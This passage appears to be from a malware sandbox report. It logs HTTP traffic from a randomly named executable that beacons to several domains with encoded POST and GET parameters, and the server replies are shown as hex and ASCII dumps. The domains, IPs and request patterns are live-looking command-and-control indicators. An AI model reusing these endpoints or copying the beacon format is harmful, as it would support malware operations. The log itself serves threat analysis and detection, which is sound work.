[TRUNCATED]
Jan 10, 2025 19:53:13.078444004 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:50:31 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49986	46.38.243.234	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:15.198091984 CET	474	OUT	GET /w0kg/?ERYLmh=gdZftRfibRTMAdgnKmd9KVRywM/mYMR5KQU/CHcOE1UQTVmABoHrRdFggPQ+NAJ+Xf61Ad5PxgFkNU5U/GGJ56kA4RPcdSHkeJmiJ2vWzoHi2nE9toLKgQQ=&X6H8=IvQt7 HTTP/1.1 Host: www.lmueller.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:53:15.750020981 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:50:34 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49987	176.57.65.76	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:21.066210985 CET	735	OUT	POST /z9pt/ HTTP/1.1 Host: www.newbh.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: max-age=0 Connection: close Origin: http://www.newbh.pro Referer: http://www.newbh.pro/z9pt/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 6c 61 68 67 64 77 70 50 61 7a 68 57 37 4e 68 55 61 7a 70 76 36 76 49 31 32 4d 37 44 38 2b 71 64 75 31 30 75 66 7a 47 71 61 4b 65 47 52 72 73 64 41 78 31 4f 56 31 6c 38 43 4c 46 32 36 37 2b 2f 37 54 6d 70 55 44 33 37 4e 78 43 57 47 39 6b 39 64 73 4b 2b 6f 62 67 4e 45 31 66 50 35 6f 72 45 4a 4f 36 55 56 42 56 73 6e 4b 4f 44 4a 6a 56 49 56 55 6b 37 6a 52 52 45 79 4f 52 51 49 38 4d 2b 4e 4c 69 55 72 79 5a 70 2b 75 6a 6b 58 6f 73 77 4c 32 55 70 36 30 36 71 59 47 49 53 68 6c 37 59 75 50 78 4a 33 6f 6b 45 33 35 78 71 51 73 45 70 33 58 6d 46 59 58 31 2b 66 72 61 78 70 31 7a 6e 4e 51 3d 3d Data Ascii: ERYLmh=lahgdwpPazhW7NhUazpv6vI12M7D8+qdu10ufzGqaKeGRrsdAx1OV1l8CLF267+/7TmpUD37NxCWG9k9dsK+obgNE1fP5orEJO6UVBVsnKODJjVIVUk7jRREyORQI8M+NLiUryZp+ujkXoswL2Up606qYGIShl7YuPxJ3okE35xqQsEp3XmFYX1+fraxp1znNQ==
Jan 10, 2025 19:53:21.749763012 CET	1212	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=ralZvCIgFwSdZ9eK; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:21 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:21 GMT Set-Cookie: __ddg10_=1736535201; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:21 GMT Set-Cookie: __ddg1_=n0NLoaaUrRBZqMka7hzb; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sat, 10-Jan-2026 18:53:21 GMT date: Fri, 10 Jan 2025 18:53:21 GMT content-type: text/html; charset=iso-8859-1 content-length: 386 location: https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&khz=i2gfh x-host: www.newbh.pro x-tilda-server: 29 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 7a 39 70 74 2f 3f 35 73 38 3d 6f 59 4a 41 65 47 39 57 4e 54 6c 50 38 75 74 4e 58 79 38 33 75 71 38 39 6e 71 61 73 72 74 66 37 34 41 41 67 50 48 6e 43 63 65 4b 77 5a 63 46 59 52 6a 31 6f 41 54 6b 65 55 4c 4a 69 6c 71 57 48 35 56 57 31 63 53 33 67 45 79 61 4c 49 4e 6b 35 58 61 43 43 6b 74 77 62 45 55 72 44 7a 4c 61 2f 44 61 7a 65 46 51 67 4c 70 36 32 46 50 32 38 76 52 6e 41 76 74 41 64 61 30 34 35 58 4e 38 5a 57 59 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&khz=i2gfh">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	49988	176.57.65.76	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:23.612287045 CET	755	OUT	POST /z9pt/ HTTP/1.1 Host: www.newbh.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: max-age=0 Connection: close Origin: http://www.newbh.pro Referer: http://www.newbh.pro/z9pt/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 6c 61 68 67 64 77 70 50 61 7a 68 57 36 74 52 55 57 30 31 76 72 66 49 71 6f 63 37 44 6d 4f 72 55 75 31 34 75 66 79 79 36 61 38 75 47 52 50 38 64 61 77 31 4f 55 31 6c 38 49 72 46 4a 6c 4c 2b 4f 37 55 75 4c 55 43 62 37 4e 78 47 57 47 2f 73 39 64 62 65 39 70 4c 67 50 52 6c 66 4e 33 49 72 45 4a 4f 36 55 56 42 51 4a 6e 4b 57 44 4f 54 46 49 61 57 41 34 38 68 52 48 6b 65 52 51 4d 38 4d 36 4e 4c 69 4d 72 7a 46 54 2b 6f 6e 6b 58 74 51 77 4d 69 35 62 31 30 36 73 48 57 4a 6a 70 77 69 4a 6c 75 68 49 77 4b 34 6a 78 34 35 6d 52 71 4a 7a 6e 30 76 53 62 45 39 38 4c 4e 37 42 67 45 57 75 57 61 66 43 73 52 30 51 6e 72 63 62 56 73 39 53 43 79 44 6e 58 36 49 3d Data Ascii: ERYLmh=lahgdwpPazhW6tRUW01vrfIqoc7DmOrUu14ufyy6a8uGRP8daw1OU1l8IrFJlL+O7UuLUCb7NxGWG/s9dbe9pLgPRlfN3IrEJO6UVBQJnKWDOTFIaWA48hRHkeRQM8M6NLiMrzFT+onkXtQwMi5b106sHWJjpwiJluhIwK4jx45mRqJzn0vSbE98LN7BgEWuWafCsR0QnrcbVs9SCyDnX6I=
Jan 10, 2025 19:53:24.277594090 CET	1224	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=N06uwfpeSz4J9H3i; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:24 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:24 GMT Set-Cookie: __ddg10_=1736535204; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:24 GMT Set-Cookie: __ddg1_=7k0VAGg9APuf3NvrG5nO; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sat, 10-Jan-2026 18:53:24 GMT date: Fri, 10 Jan 2025 18:53:24 GMT content-type: text/html; charset=iso-8859-1 content-length: 386 location: https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&khz=i2gfh x-ws-id: 2 x-host: www.newbh.pro x-tilda-server: 31 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 7a 39 70 74 2f 3f 35 73 38 3d 6f 59 4a 41 65 47 39 57 4e 54 6c 50 38 75 74 4e 58 79 38 33 75 71 38 39 6e 71 61 73 72 74 66 37 34 41 41 67 50 48 6e 43 63 65 4b 77 5a 63 46 59 52 6a 31 6f 41 54 6b 65 55 4c 4a 69 6c 71 57 48 35 56 57 31 63 53 33 67 45 79 61 4c 49 4e 6b 35 58 61 43 43 6b 74 77 62 45 55 72 44 7a 4c 61 2f 44 61 7a 65 46 51 67 4c 70 36 32 46 50 32 38 76 52 6e 41 76 74 41 64 61 30 34 35 58 4e 38 5a 57 59 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&khz=i2gfh">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	49989	176.57.65.76	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:26.395029068 CET	1768	OUT	POST /z9pt/ HTTP/1.1 Host: www.newbh.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1235 Cache-Control: max-age=0 Connection: close Origin: http://www.newbh.pro Referer: http://www.newbh.pro/z9pt/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 6c 61 68 67 64 77 70 50 61 7a 68 57 36 74 52 55 57 30 31 76 72 66 49 71 6f 63 37 44 6d 4f 72 55 75 31 34 75 66 79 79 36 61 2f 4f 47 57 39 30 64 41 54 4e 4f 58 31 6c 38 4f 62 46 79 6c 4c 2b 70 37 53 47 50 55 44 6e 42 4e 79 75 57 58 71 67 39 56 4a 6d 39 6e 37 67 50 4a 56 66 41 35 6f 72 72 4a 4b 6d 51 56 41 67 4a 6e 4b 57 44 4f 56 4a 49 65 45 6b 34 76 78 52 45 79 4f 52 63 49 38 4d 53 4e 4c 36 32 72 7a 41 73 2b 59 48 6b 58 4a 4d 77 4e 58 56 62 71 45 36 75 45 57 4a 37 70 77 6e 52 6c 75 38 78 77 4c 4e 32 78 34 42 6d 54 63 59 76 32 41 62 4f 46 53 31 2f 49 64 48 6e 38 6b 4f 34 52 49 62 65 6a 52 67 46 2f 63 55 53 55 39 4a 59 64 42 50 55 49 4b 4e 31 67 42 67 43 66 42 32 34 46 75 34 4e 5a 33 31 42 2f 6f 55 76 79 4b 6e 74 43 30 6a 71 67 6a 65 6b 63 76 39 66 30 37 39 35 70 74 52 62 2f 43 30 2b 69 61 49 61 56 43 65 4e 50 66 43 6f 4e 41 4a 34 33 76 41 65 4c 38 44 64 43 4e 37 37 39 55 4f 67 5a 4a 49 78 6f 64 6f 45 4c 55 39 53 6b 74 33 55 2f 55 33 6f 75 56 65 6d 4b 6f 67 76 63 63 58 74 5a 6f 62 [TRUNCATED] Data Ascii: ERYLmh=lahgdwpPazhW6tRUW01vrfIqoc7DmOrUu14ufyy6a/OGW90dATNOX1l8ObFylL+p7SGPUDnBNyuWXqg9VJm9n7gPJVfA5orrJKmQVAgJnKWDOVJIeEk4vxREyORcI8MSNL62rzAs+YHkXJMwNXVbqE6uEWJ7pwnRlu8xwLN2x4BmTcYv2AbOFS1/IdHn8kO4RIbejRgF/cUSU9JYdBPUIKN1gBgCfB24Fu4NZ31B/oUvyKntC0jqgjekcv9f0795ptRb/C0+iaIaVCeNPfCoNAJ43vAeL8DdCN779UOgZJIxodoELU9Skt3U/U3ouVemKogvccXtZobygGi0jMSvtLAvKBvPvC5PCUdHJGXSQAxfAZJrX066NCs0uWhxIth3xKooQCj4xiSMtzUqPO1xcm0FUsnHdEi5/6xHiu7MsuiAXmjAkU017ZLwW6czu+XutuMdHgPL/6lTmuGGzQvoRprpTAOrb1RA3pCAVR88e7TdA0wUHwMmMiISdemAbIBbI3DmeB4HAe6xdaZgDotVzUBQnq+99sNKh3pVlMlAlq9gY/LAatKDBAdP0rsqYh0qbi2QlzTSgHOEfJrenE391A6VoWwlc9o2UF4SI/SdE77KjoEBoUaffAn1xTKn3SesjSyD0a6H4M9AfSKky5fux5tD+yDHo/DgMFHB4SgIxVm4urrBNW9B2778S7XShAT+pFQup70L4aggextK6cFe5VutmQiJXoQXXb3BsMNcw9isVaIcCKRSGIfJoO9BzgJhejW07KYVBth2S3309/NQvE7BMuDbasWr7b4nggCOg9R453+6yQGZxmj1bZfZvVoeKANCU2RcH78/O1RLjN9/Ve1hr5esOOX+BObjyOTQlj1Oyq8OykVb8+zGlN0CNoZ9JSz8QlTlzs/BnQrX9jvccliEfMpG791VoLa+AzEIp9gVb0Hzx7RbCXBM67iEvlIx2J5FDqiDTWvMou2IUMC+5gIrK0RWk5W8wGEidxMShs6JA [TRUNCATED]
Jan 10, 2025 19:53:27.117566109 CET	1230	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=2tSQlfOwXuZSbuIY; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:26 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:26 GMT Set-Cookie: __ddg10_=1736535206; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:26 GMT Set-Cookie: __ddg1_=linlV9laXM9GrEOVfSVc; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sat, 10-Jan-2026 18:53:26 GMT date: Fri, 10 Jan 2025 18:53:26 GMT content-type: text/html; charset=iso-8859-1 content-length: 389 location: https://www.newbh.pro/z9pt/?UBjxex5P=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&d4=dt0t x-ws-id: 2 x-host: www.newbh.pro x-tilda-server: 15 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 7a 39 70 74 2f 3f 55 42 6a 78 65 78 35 50 3d 6f 59 4a 41 65 47 39 57 4e 54 6c 50 38 75 74 4e 58 79 38 33 75 71 38 39 6e 71 61 73 72 74 66 37 34 41 41 67 50 48 6e 43 63 65 4b 77 5a 63 46 59 52 6a 31 6f 41 54 6b 65 55 4c 4a 69 6c 71 57 48 35 56 57 31 63 53 33 67 45 79 61 4c 49 4e 6b 35 58 61 43 43 6b 74 77 62 45 55 72 44 7a 4c 61 2f 44 61 7a 65 46 51 67 4c 70 36 32 46 50 32 38 76 52 6e 41 76 74 41 64 61 30 34 35 58 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/z9pt/?UBjxex5P=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&d4=dt0t">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.11	49990	176.57.65.76	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:28.933474064 CET	471	OUT	GET /z9pt/?ERYLmh=oYJAeG9WNTlP8utNbygd6NUbjqahrsf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCgtw4AU7Y7avcI6zeRyEIpqmuKn0rd3BmnQw=&X6H8=IvQt7 HTTP/1.1 Host: www.newbh.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:53:29.773893118 CET	1224	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=JIZpdFKVgt7OYz62; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:29 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:29 GMT Set-Cookie: __ddg10_=1736535209; Domain=.newbh.pro; Path=/; Expires=Fri, 10-Jan-2025 19:13:29 GMT Set-Cookie: __ddg1_=DBfYr5fyRJRWTk2AfFWU; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sat, 10-Jan-2026 18:53:29 GMT date: Fri, 10 Jan 2025 18:53:29 GMT content-type: text/html; charset=iso-8859-1 content-length: 386 location: https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&khz=i2gfh x-ws-id: 2 x-host: www.newbh.pro x-tilda-server: 31 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 7a 39 70 74 2f 3f 35 73 38 3d 6f 59 4a 41 65 47 39 57 4e 54 6c 50 38 75 74 4e 58 79 38 33 75 71 38 39 6e 71 61 73 72 74 66 37 34 41 41 67 50 48 6e 43 63 65 4b 77 5a 63 46 59 52 6a 31 6f 41 54 6b 65 55 4c 4a 69 6c 71 57 48 35 56 57 31 63 53 33 67 45 79 61 4c 49 4e 6b 35 58 61 43 43 6b 74 77 62 45 55 72 44 7a 4c 61 2f 44 61 7a 65 46 51 67 4c 70 36 32 46 50 32 38 76 52 6e 41 76 74 41 64 61 30 34 35 58 4e 38 5a 57 59 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/z9pt/?5s8=oYJAeG9WNTlP8utNXy83uq89nqasrtf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCktwbEUrDzLa/DazeFQgLp62FP28vRnAvtAda045XN8ZWYw==&khz=i2gfh">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.11	49991	209.74.79.42	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:47.957094908 CET	750	OUT	POST /nhb9/ HTTP/1.1 Host: www.valuault.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: max-age=0 Connection: close Origin: http://www.valuault.store Referer: http://www.valuault.store/nhb9/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 6f 7a 43 6b 54 4b 76 71 4a 4e 69 68 63 42 6f 7a 75 59 6e 63 41 56 78 73 63 72 6b 35 4b 4a 65 43 64 6e 6e 59 56 4d 43 66 52 71 51 6a 77 4e 55 4c 30 6b 53 7a 39 47 44 50 34 50 38 68 32 4d 65 6b 50 7a 57 63 45 4f 4a 2f 42 73 6e 67 4a 4f 6f 65 72 4d 51 56 2b 47 7a 73 43 77 32 6a 64 72 75 75 6b 51 74 68 69 6e 31 78 66 45 32 6d 4c 52 6c 58 59 54 36 32 61 6d 77 50 77 72 54 6e 53 57 50 48 53 6f 52 53 39 6b 68 2f 6e 61 73 56 34 63 57 4e 6f 48 4a 4c 70 52 62 33 57 38 72 4b 2f 36 33 43 42 54 37 38 43 5a 35 43 59 35 36 30 30 2b 30 38 45 4d 36 5a 63 77 3d 3d Data Ascii: 